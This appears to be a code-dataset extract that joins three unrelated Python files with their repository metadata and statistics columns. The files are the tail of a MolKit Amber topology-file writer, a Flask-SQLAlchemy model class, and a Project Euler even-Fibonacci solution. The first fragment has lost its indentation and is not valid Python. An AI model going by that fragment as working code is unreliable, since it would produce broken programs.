self.writeList(fptr, dict['Ipres'][:-1], '%6d', 12 )
for k in ['Rk', 'Req', 'Tk', 'Teq',
'Pk', 'Pn', 'Phase', 'Solty', 'Cn1','Cn2']:
item = dict[k]
f = self.formatD[k]
if f[2]:
self.writeTupleList(fptr, item, f[0], f[1], f[2])
else:
self.writeList(fptr, item, f[0], f[1])
#next write bnds angs and dihe
allHBnds = zip(dict['BondHAt1'], dict['BondHAt2'],
dict['BondHNum'])
self.writeTupleList(fptr, allHBnds, "%6d", 12, 3)
allBnds = zip(dict['BondAt1'], dict['BondAt2'],
dict['BondNum'])
self.writeTupleList(fptr, allBnds, "%6d", 12, 3)
allHAngs = zip(dict['AngleHAt1'], dict['AngleHAt2'],
dict['AngleHAt3'], dict['AngleHNum'])
self.writeTupleList(fptr, allHAngs, "%6d", 12,4)
allAngs = zip(dict['AngleAt1'], dict['AngleAt2'],
dict['AngleAt3'], dict['AngleNum'])
self.writeTupleList(fptr, allAngs, "%6d", 12, 4)
allHDiHe = zip(dict['DihHAt1'], dict['DihHAt2'],
dict['DihHAt3'], dict['DihHAt4'], dict['DihHNum'])
self.writeTupleList(fptr, allHDiHe, "%6d", 12,5)
allDiHe = zip(dict['DihAt1'], dict['DihAt2'],
dict['DihAt3'], dict['DihAt4'], dict['DihNum'])
self.writeTupleList(fptr, allDiHe, "%6d", 12, 5)
self.writeList(fptr, dict['ExclAt'], '%6d', 12)
fptr.write('\n')
fptr.write('\n')
fptr.write('\n')
for k in ['AtomSym', 'AtomTree']:
item = dict[k][:-81]
self.writeString(fptr, item)
zList = []
for i in range(dict['Natom']):
zList.append(0)
self.writeList(fptr, zList, "%6d", 12)
self.writeList(fptr, zList, "%6d", 12)
fptr.close()
def writeString(self, fptr, item):
n = int(ceil(len(item)/80.))
for p in range(n):
if p!=n-1:
fptr.write(item[p*80:(p+1)*80]+'\n')
else:
#write to the end, wherever it is
fptr.write(item[p*80:]+'\n')
def writeList(self, fptr, outList, formatStr="%4.4s", lineCt=12):
ct = 0
s = ""
nlformatStr = formatStr+'\n'
lenList = len(outList)
for i in range(lenList):
#do something with outList[i]
s = s + formatStr%outList[i]
#ct is how many item are in s
ct = ct + 1
#if line is full, write it and reset s and ct
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
#if last entry write it and exit
elif i == lenList-1:
s = s + '\n'
fptr.write(s)
break
def writeTupleList(self, fptr, outList, formatStr="%4.4s", lineCt=12, ll=2):
ct = 0
s = ""
nlformatStr = formatStr+'\n'
for i in range(len(outList)):
if i==len(outList)-1:
for k in range(ll):
s = s + formatStr%outList[i][k]
ct = ct + 1
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
#after adding last entry, if anything left, print it
if ct!=0:
s = s + '\n'
fptr.write(s)
else:
for k in range(ll):
s = s + formatStr%outList[i][k]
ct = ct + 1
if ct%lineCt==0:
s = s + '\n'
fptr.write(s)
s = ""
ct = 0
def writeItitl(self, fptr, ititl):
fptr.write(ititl)
def writeSummary(self, fptr):
#SUMMARY
#fptr.write('SUMMARY\n')
##FIX THESE NAMES!!!
kL1 = ['Natom','Ntypes','Nbonh','Mbona',\
'Ntheth','Mtheta','Nphih','Mphia','Nhparm',\
'Nparm','Nnb','Nres']
kL2 = ['Nbona','Ntheta','Nphia','Numbnd',\
'Numang','Nptra','Natyp','Nphb','Ifpert',\
'Nbper','Ngper','Ndper']
kL3 = ['Mbper','Mgper','Mdper','IfBox','Nmxrs',\
'IfCap']
for l in [kL1, kL2, kL3]:
newL = []
for item in l:
newL.append(self.prmDict[item])
#print 'newL=', newL
self.writeList(fptr, newL, "%6d", 12)
if __name__ == '__main__':
# load a protein and build bonds
from MolKit import Read
p = Read('sff/testdir/p1H.pdb')
p[0].buildBondsByDistance()
# build an Amber parameter description objects
from MolKit.amberPrmTop import ParameterDict
pd = ParameterDict()
from MolKit.amberPrmTop import Parm
prm = Parm()
prm.processAtoms(p.chains.residues.atoms)
| 34.037879 | 108 | 0.476167 | 6,089 | 53,916 | 4.200526 | 0.139924 | 0.009149 | 0.008914 | 0.013371 | 0.248505 | 0.185401 | 0.145169 | 0.127576 | 0.109982 | 0.102788 | 0 | 0.040112 | 0.384097 | 53,916 | 1,583 | 109 | 34.059381 | 0.730117 | 0.131686 | 0 | 0.204064 | 0 | 0 | 0.081733 | 0.005265 | 0 | 0 | 0 | 0.000632 | 0.050353 | 0 | null | null | 0.000883 | 0.010601 | null | null | 0.013251 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d211994f319cdf819a2e0d0b5d58c4101deb9cd5 | 418 | py | Python | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | null | null | null | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | 41 | 2021-09-01T17:31:47.000Z | 2022-03-28T12:13:12.000Z | app/main/models/hello_db.py | ZenithClown/flask-docker-template | cf5949fb6f448dd73cc287842b5deb1d5f7bd321 | [
"MIT"
] | 1 | 2021-12-22T07:25:08.000Z | 2021-12-22T07:25:08.000Z | # -*- encoding: utf-8 -*-
from .. import db
from ._base_model import ModelSchema
class HelloDB(db.Model, ModelSchema):
    """Use the Model to Establish a Connection to DB"""

    __tablename__ = "HelloDB"

    id = db.Column(db.Integer, primary_key = True, autoincrement = True, nullable = False)
    field = db.Column(db.String(255), nullable = False)

    def __init__(self):
        ModelSchema().__init__()
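# Illustrative usage (assumed; the Flask app factory and `db` wiring live
# elsewhere in this template, so `app` below is a placeholder):
#     with app.app_context():
#         db.create_all()
#         row = HelloDB()
#         row.field = "demo"
#         db.session.add(row)
#         db.session.commit()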
| 24.588235 | 93 | 0.665072 | 52 | 418 | 5.057692 | 0.634615 | 0.060837 | 0.076046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.205742 | 418 | 16 | 94 | 26.125 | 0.78012 | 0.167464 | 0 | 0 | 0 | 0 | 0.020468 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d2162729fc2afb100ad7e2d7244982b56598a414 | 822 | py | Python | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | scripts/problem0002.py | Joel301/Project_Euler | 2280dc19b8e0a2c956cf0d6db6c7d24eedd5e943 | [
"MIT"
] | null | null | null | #! python3
# -*- coding: utf-8 -*-
"""
Euler description from https://projecteuler.net/
Problem 0002
Each new term in the Fibonacci sequence is generated by adding the previous two
terms. By starting with 1 and 2, the first 10 terms will be:
1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
By considering the terms in the Fibonacci sequence whose values do not exceed
four million[4000000], find the sum of the even-valued terms.
"""
#fibonacci list generator
def fibonacci(limit=89):
    """Return the Fibonacci terms 1, 2, 3, ... whose values do not exceed limit."""
    lst = [1, 2]
    n1, n2 = 1, 2
    while n1 + n2 <= limit:
        n = n1 + n2
        n1, n2 = n2, n
        lst.append(n)
    return lst
# main function, same approach as problem0001
def compute(v = 4000000):
    ans = sum(x for x in fibonacci(v) if x % 2 == 0)
    return ans


if __name__ == "__main__":
    print(compute(4000000))
| 22.833333 | 79 | 0.644769 | 132 | 822 | 3.954545 | 0.621212 | 0.011494 | 0.05364 | 0.084291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 0.248175 | 822 | 35 | 80 | 23.485714 | 0.737864 | 0.585158 | 0 | 0 | 1 | 0 | 0.024242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |